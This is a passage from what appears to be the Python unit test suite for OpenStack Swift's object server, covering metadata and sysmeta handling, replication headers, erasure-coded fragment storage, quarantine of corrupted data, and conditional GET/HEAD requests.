'X-Object-Transient-Sysmeta-Foo': 'Bar'})
req.body = 'VERIFY SYSMETA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'X-Object-Meta-1': 'Not One',
'X-Object-Sysmeta-1': 'Not One',
'X-Object-Sysmeta-Two': 'Not Two',
'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
def check_response(resp):
# user meta should be updated but not sysmeta
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.content_length, 14)
self.assertEqual(resp.content_type, 'text/plain')
self.assertEqual(resp.headers['content-type'], 'text/plain')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp2)))))
self.assertEqual(resp.headers['etag'],
'"1000d172764c9dbc3a5798a67ec5bb76"')
self.assertEqual(resp.headers['x-object-meta-1'], 'Not One')
self.assertEqual(resp.headers['x-object-sysmeta-0'], 'Zero')
self.assertEqual(resp.headers['x-object-sysmeta-1'], 'One')
self.assertEqual(resp.headers['x-object-sysmeta-two'], 'Two')
self.assertEqual(resp.headers['x-object-transient-sysmeta-foo'],
'Not Bar')
self.assertNotIn('x-object-meta-0', resp.headers)
self.assertNotIn('x-object-transient-sysmeta-0', resp.headers)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
check_response(resp)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
check_response(resp)
def test_PUT_with_replication_headers(self):
# check that otherwise disallowed headers are accepted when specified
# by X-Backend-Replication-Headers
# first PUT object
timestamp1 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'Content-Length': '14',
'Etag': '1000d172764c9dbc3a5798a67ec5bb76',
'Custom-Header': 'custom1',
'X-Object-Meta-1': 'meta1',
'X-Static-Large-Object': 'False'})
req.body = 'VERIFY SYSMETA'
# restrict set of allowed headers on this server
with mock.patch.object(self.object_controller, 'allowed_headers',
['Custom-Header']):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp1 + '.data')
# X-Static-Large-Object is disallowed.
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp1,
'Content-Type': 'text/plain',
'Content-Length': '14',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'Custom-Header': 'custom1',
'X-Object-Meta-1': 'meta1'})
# PUT object again with X-Backend-Replication-Headers
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp2,
'Content-Type': 'text/plain',
'Content-Length': '14',
'Etag': '1000d172764c9dbc3a5798a67ec5bb76',
'Custom-Header': 'custom1',
'X-Object-Meta-1': 'meta1',
'X-Static-Large-Object': 'False',
'X-Backend-Replication-Headers':
'X-Static-Large-Object'})
req.body = 'VERIFY SYSMETA'
with mock.patch.object(self.object_controller, 'allowed_headers',
['Custom-Header']):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')),
timestamp2 + '.data')
# X-Static-Large-Object should be copied since it is now allowed by
# replication headers.
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': timestamp2,
'Content-Type': 'text/plain',
'Content-Length': '14',
'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
'name': '/a/c/o',
'Custom-Header': 'custom1',
'X-Object-Meta-1': 'meta1',
'X-Static-Large-Object': 'False'})
def test_PUT_container_connection(self):
def mock_http_connect(response, with_exc=False):
class FakeConn(object):
def __init__(self, status, with_exc):
self.status = status
self.reason = 'Fake'
self.host = '1.2.3.4'
self.port = '1234'
self.with_exc = with_exc
def getresponse(self):
if self.with_exc:
raise Exception('test')
return self
def read(self, amt=None):
return ''
return lambda *args, **kwargs: FakeConn(response, with_exc)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1',
'Content-Length': '0'})
with mock.patch.object(
object_server, 'http_connect', mock_http_connect(201)):
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1',
'Content-Length': '0'})
with mock.patch.object(
object_server, 'http_connect', mock_http_connect(500)):
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1',
'Content-Length': '0'})
with mock.patch.object(
object_server, 'http_connect',
mock_http_connect(500, with_exc=True)):
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_EC_GET_PUT_data(self):
for policy in self.ec_policies:
raw_data = ('VERIFY' * policy.ec_segment_size)[:-432]
frag_archives = encode_frag_archive_bodies(policy, raw_data)
frag_index = random.randint(0, len(frag_archives) - 1)
# put EC frag archive
req = Request.blank('/sda1/p/a/c/o', method='PUT', headers={
'X-Timestamp': next(self.ts).internal,
'Content-Type': 'application/verify',
'Content-Length': len(frag_archives[frag_index]),
'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
'X-Backend-Storage-Policy-Index': int(policy),
})
req.body = frag_archives[frag_index]
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# get EC frag archive
req = Request.blank('/sda1/p/a/c/o', headers={
'X-Backend-Storage-Policy-Index': int(policy),
})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, frag_archives[frag_index])
def test_EC_GET_quarantine_invalid_frag_archive(self):
policy = random.choice(self.ec_policies)
raw_data = ('VERIFY' * policy.ec_segment_size)[:-432]
frag_archives = encode_frag_archive_bodies(policy, raw_data)
frag_index = random.randint(0, len(frag_archives) - 1)
content_length = len(frag_archives[frag_index])
# put EC frag archive
req = Request.blank('/sda1/p/a/c/o', method='PUT', headers={
'X-Timestamp': next(self.ts).internal,
'Content-Type': 'application/verify',
'Content-Length': content_length,
'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
'X-Backend-Storage-Policy-Index': int(policy),
})
corrupt = 'garbage' + frag_archives[frag_index]
req.body = corrupt[:content_length]
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# get EC frag archive
req = Request.blank('/sda1/p/a/c/o', headers={
'X-Backend-Storage-Policy-Index': int(policy),
})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
with self.assertRaises(DiskFileQuarantined) as ctx:
resp.body
self.assertIn("Invalid EC metadata", str(ctx.exception))
# nothing is logged on *our* loggers
errors = self.object_controller.logger.get_lines_for_level('error')
self.assertEqual(errors, [])
# get EC frag archive - it's gone
req = Request.blank('/sda1/p/a/c/o', headers={
'X-Backend-Storage-Policy-Index': int(policy),
})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
def test_PUT_ssync_multi_frag(self):
timestamp = utils.Timestamp(time()).internal
def put_with_index(expected_rsp, frag_index, node_index=None):
data_file_tail = '#%d#d.data' % frag_index
headers = {'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'X-Backend-Ssync-Frag-Index': node_index,
'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
'X-Backend-Storage-Policy-Index': int(policy)}
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(
resp.status_int, expected_rsp,
'got %s != %s for frag_index=%s node_index=%s' % (
resp.status_int, expected_rsp,
frag_index, node_index))
if expected_rsp == 409:
return
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(int(policy)),
'p', hash_path('a', 'c', 'o')))
data_file = os.path.join(obj_dir, timestamp) + data_file_tail
self.assertTrue(os.path.isfile(data_file),
'Expected file %r not found in %r for policy %r'
% (data_file, os.listdir(obj_dir), int(policy)))
for policy in POLICIES:
if policy.policy_type == EC_POLICY:
# upload with a ec-frag-index
put_with_index(201, 3)
# same timestamp will conflict a different ec-frag-index
put_with_index(409, 2)
# but with the ssync-frag-index (primary node) it will just
# save both!
put_with_index(201, 2, 2)
# but even with the ssync-frag-index we can still get a
# timestamp collisison if the file already exists
put_with_index(409, 3, 3)
# FWIW, ssync will never send in-consistent indexes - but if
# something else did, from the object server perspective ...
# ... the ssync-frag-index is canonical on the
# read/pre-existance check
put_with_index(409, 7, 2)
# ... but the ec-frag-index is canonical when it comes to on
# disk file
put_with_index(201, 7, 6)
def test_PUT_commits_data(self):
for policy in POLICIES:
timestamp = utils.Timestamp(int(time())).internal
data_file_tail = '.data'
headers = {'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
# commit renames data file
headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
data_file_tail = '#2#d.data'
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(int(policy)),
'p', hash_path('a', 'c', 'o')))
data_file = os.path.join(obj_dir, timestamp) + data_file_tail
self.assertTrue(os.path.isfile(data_file),
'Expected file %r not found in %r for policy %r'
% (data_file, os.listdir(obj_dir), int(policy)))
rmtree(obj_dir)
def test_HEAD(self):
# Test swift.obj.server.ObjectController.HEAD
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertFalse('X-Backend-Timestamp' in resp.headers)
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.content_length, 6)
self.assertEqual(resp.content_type, 'application/x-test')
self.assertEqual(resp.headers['content-type'], 'application/x-test')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
self.assertEqual(resp.headers['etag'],
'"0b4c12d7e0a73840c1c4f148fda3b037"')
self.assertEqual(resp.headers['x-object-meta-1'], 'One')
self.assertEqual(resp.headers['x-object-meta-two'], 'Two')
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
os.unlink(objfile)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(timestamp).internal)
def test_HEAD_quarantine_zbyte(self):
# Test swift.obj.server.ObjectController.GET
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
disk_file.open()
file_name = os.path.basename(disk_file._data_file)
with open(disk_file._data_file) as fp:
metadata = diskfile.read_metadata(fp)
os.unlink(disk_file._data_file)
with open(disk_file._data_file, 'w') as fp:
diskfile.write_metadata(fp, metadata)
file_name = os.path.basename(disk_file._data_file)
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_OPTIONS(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
server_handler = object_server.ObjectController(
conf, logger=debug_logger())
req = Request.blank('/sda1/p/a/c/o', {'REQUEST_METHOD': 'OPTIONS'})
req.content_length = 0
resp = server_handler.OPTIONS(req)
self.assertEqual(200, resp.status_int)
for verb in 'OPTIONS GET POST PUT DELETE HEAD REPLICATE \
SSYNC'.split():
self.assertTrue(
verb in resp.headers['Allow'].split(', '))
self.assertEqual(len(resp.headers['Allow'].split(', ')), 8)
self.assertEqual(resp.headers['Server'],
(server_handler.server_type + '/' + swift_version))
def test_GET(self):
# Test swift.obj.server.ObjectController.GET
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertFalse('X-Backend-Timestamp' in resp.headers)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, 'VERIFY')
self.assertEqual(resp.content_length, 6)
self.assertEqual(resp.content_type, 'application/x-test')
self.assertEqual(resp.headers['content-length'], '6')
self.assertEqual(resp.headers['content-type'], 'application/x-test')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
self.assertEqual(resp.headers['etag'],
'"0b4c12d7e0a73840c1c4f148fda3b037"')
self.assertEqual(resp.headers['x-object-meta-1'], 'One')
self.assertEqual(resp.headers['x-object-meta-two'], 'Two')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=1-3'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'ERI')
self.assertEqual(resp.headers['content-length'], '3')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=1-'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'ERIFY')
self.assertEqual(resp.headers['content-length'], '5')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=-2'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'FY')
self.assertEqual(resp.headers['content-length'], '2')
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
os.unlink(objfile)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application:octet-stream',
'Content-Length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(timestamp).internal)
def test_GET_if_match(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={
'If-Match': '"11111111111111111111111111111111", "%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={
'If-Match':
'"11111111111111111111111111111111", '
'"22222222222222222222222222222222"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def test_GET_if_match_etag_is_at(self):
headers = {
'X-Timestamp': utils.Timestamp(time()).internal,
'Content-Type': 'application/octet-stream',
'X-Object-Meta-Xtag': 'madeup',
'X-Object-Sysmeta-Xtag': 'alternate madeup',
}
req = Request.blank('/sda1/p/a/c/o', method='PUT',
headers=headers)
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
real_etag = resp.etag
# match x-backend-etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, using first in list of alternates
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At':
'X-Object-Meta-Xtag,X-Object-Sysmeta-Z'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, using second in list of alternates
alts = 'X-Object-Sysmeta-Y,X-Object-Meta-Xtag,X-Object-Sysmeta-Z'
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At': alts})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, choosing first of multiple alternates
alts = 'X-Object-Sysmeta-Y,X-Object-Meta-Xtag,X-Object-Sysmeta-Xtag'
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup',
'X-Backend-Etag-Is-At': alts})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# match x-backend-etag-is-at, choosing first of multiple alternates
# (switches order of second two alternates from previous assertion)
alts = 'X-Object-Sysmeta-Y,X-Object-Sysmeta-Xtag,X-Object-Meta-Xtag'
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'alternate madeup',
'X-Backend-Etag-Is-At': alts})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# no match x-backend-etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': real_etag,
'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
# etag-is-at metadata doesn't exist, default to real etag
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': real_etag,
'X-Backend-Etag-Is-At': 'X-Object-Meta-Missing'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# sanity no-match with no etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': 'madeup'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
# sanity match with no etag-is-at
req = Request.blank('/sda1/p/a/c/o', headers={
'If-Match': real_etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
# sanity with no if-match
req = Request.blank('/sda1/p/a/c/o', headers={
'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_HEAD_if_match(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={
'If-Match': '"11111111111111111111111111111111", "%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={
'If-Match':
'"11111111111111111111111111111111", '
'"22222222222222222222222222222222"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def test_GET_if_none_match(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'X-Object-Meta-Soup': 'gazpacho',
'Content-Type': 'application/fizzbuzz',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
self.assertEqual(resp.headers['Content-Type'], 'application/fizzbuzz')
self.assertEqual(resp.headers['X-Object-Meta-Soup'], 'gazpacho')
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-None-Match':
'"11111111111111111111111111111111", '
'"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
def test_HEAD_if_none_match(self):
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
etag = resp.etag
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '*'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match': '"11111111111111111111111111111111"'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.etag, etag)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-None-Match':
'"11111111111111111111111111111111", '
'"%s"' % etag})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
self.assertEqual(resp.etag, etag)
def test_GET_if_modified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
